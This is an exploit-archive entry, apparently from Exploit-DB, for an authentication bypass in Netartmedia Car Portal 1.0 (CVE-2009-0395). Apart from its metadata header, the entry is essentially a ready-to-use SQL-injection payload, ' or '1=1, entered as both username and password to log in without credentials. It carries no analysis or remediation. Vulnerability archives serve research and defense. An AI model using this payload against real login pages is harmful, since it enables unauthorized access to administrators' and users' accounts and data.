Netartmedia Car Portal 1.0 - Authentication Bypass

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2009-01-28 
date_updated: 2009-01-29 
verified: 1 
codes: OSVDB-51790;CVE-2009-0395 
tags: 
aliases:  
screenshot_url:  
application_url: 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              Car Portal v1.0 (Bypass) Remote SQL Injection Vuln.
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   CAR PORTAL, version 1.0
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Exploit:
=
=                       //Username:  ' or '1=1
=                        //Password:  ' or '1=1
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-01-29]